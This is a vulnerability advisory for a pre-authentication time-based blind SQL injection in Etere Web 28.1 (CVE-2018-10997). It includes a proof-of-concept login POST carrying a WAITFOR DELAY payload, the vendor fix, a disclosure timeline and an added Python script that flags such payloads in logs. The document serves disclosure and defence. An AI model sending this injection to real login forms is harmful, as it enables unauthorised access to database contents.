Technicolor Security Office - Vulnerability Advisory
#######################################################################
#Title: Time-Based Blind SQL-Injection
#Product: Etere Web
#Homepage: https://www.etere.com/DocView/1009/ETEREWEB.aspx
#Vulnerable versions: Etere Web 28.1
#CVE: CVE-2018-10997
#Impact: critical
#Discoverer: Dion Bellemare
#######################################################################
-----------------------------------------------------------------------
[Description]
EtereWeb 28.1 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword.
-----------------------------------------------------------------------
[Vendor of Product]
Etere Pte Ltd
-----------------------------------------------------------------------
[Affected Product Code Base]
EtereWeb - 28.1
-----------------------------------------------------------------------
[Attack Type]
Remote
-----------------------------------------------------------------------
[Impact Information Disclosure]
true
-----------------------------------------------------------------------
[CVE Impact Other]
An attacker can exploit this vulnerability to disclose sensitive database (MSSQL DBMS) information and contents. In some installation scenarios it may be possible to compromise the remote system and take full control.
-----------------------------------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
-----------------------------------------------------------------------
[Proof Of Concept]
Target: http://etere.example.com/etereweb/
Target Parameters: txUserName (POST)
Target Parameters: txPassword (POST)

POST /etereweb/ HTTP/1.1
Host: etere.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://etere.example.com/etereweb/
Cookie: ASP.NET_SessionId=0ep1w51ja4yezeubp2m15vo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 750

txUserName=' WAITFOR DELAY '0:0:5'--&txPassword='&btnAccedi=Login&hdIdUser=
-----------------------------------------------------------------------
[Solution]
Upgrade EtereWeb to version 28.1.20 or greater
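
A log-review check for the probe shown in the proof of concept, as an added example that is not part of the original advisory or of Etere's code: it scans form-encoded login POST bodies for WAITFOR DELAY in txUserName and txPassword and compares the requested delay with the observed response time. The function names, the verdict labels, and the sample bodies and timings are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# POST parameters the advisory names as injectable.
WATCHED = {"txUserName", "txPassword"}

# T-SQL WAITFOR DELAY, optionally followed by a 'hh:mm[:ss[.mss]]' literal.
DELAY_RE = re.compile(
    r"waitfor\s+delay(?:\s*'(\d+:\d+(?::\d+(?:\.\d+)?)?)')?", re.IGNORECASE)


def requested_delay(value):
    """Seconds requested by a WAITFOR DELAY in value; None if absent."""
    match = DELAY_RE.search(value)
    if match is None:
        return None
    if match.group(1) is None:      # delay given as a variable or odd literal
        return 0.0
    parts = [float(p) for p in match.group(1).split(":")]
    parts += [0.0] * (3 - len(parts))
    return parts[0] * 3600 + parts[1] * 60 + parts[2]


def triage(body, duration_s):
    """Return (parameter, verdict) pairs for one form-encoded login POST."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):  # URL-decodes
        delay = requested_delay(value) if name in WATCHED else None
        if delay is None:
            continue
        # A response at least as slow as the requested delay suggests the
        # statement reached the database; a fast one is an unsuccessful probe.
        verdict = "delay-executed" if 0 < delay <= duration_s else "probe"
        findings.append((name, verdict))
    return findings


# Constructed samples: (request body, server response time in seconds).
SAMPLES = [
    ("txUserName=alice&txPassword=hunter2&btnAccedi=Login&hdIdUser=", 0.12),
    ("txUserName=%27+WAITFOR+DELAY+%270%3A0%3A5%27--&txPassword=%27"
     "&btnAccedi=Login&hdIdUser=", 5.31),
    ("txUserName=bob&txPassword=' WAITFOR DELAY '0:0:5'--"
     "&btnAccedi=Login&hdIdUser=", 0.09),
]

if __name__ == "__main__":
    for body, seconds in SAMPLES:
        print(f"{seconds:5.2f}s  {triage(body, seconds)}")
```

A "delay-executed" verdict on a host still running 28.1 warrants treating the database contents as exposed; "probe" verdicts after the upgrade to 28.1.20 show attempts that no longer reach the database.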
-----------------------------------------------------------------------
[Advisory History]
2018-05-02 - Initial discovery and write-up of vuln advisory
2018-05-02 - Sent notification email to Etere contact
2018-05-03 - Received initial response from Etere
2018-05-08 - Sent email to suggest using PGP to encrypt email
2018-05-29 - Additional details of vuln provided to Etere
2018-05-31 - Etere responds that vuln is fixed in version 28.1.20
-----------------------------------------------------------------------
[Discoverer]
Dion Bellemare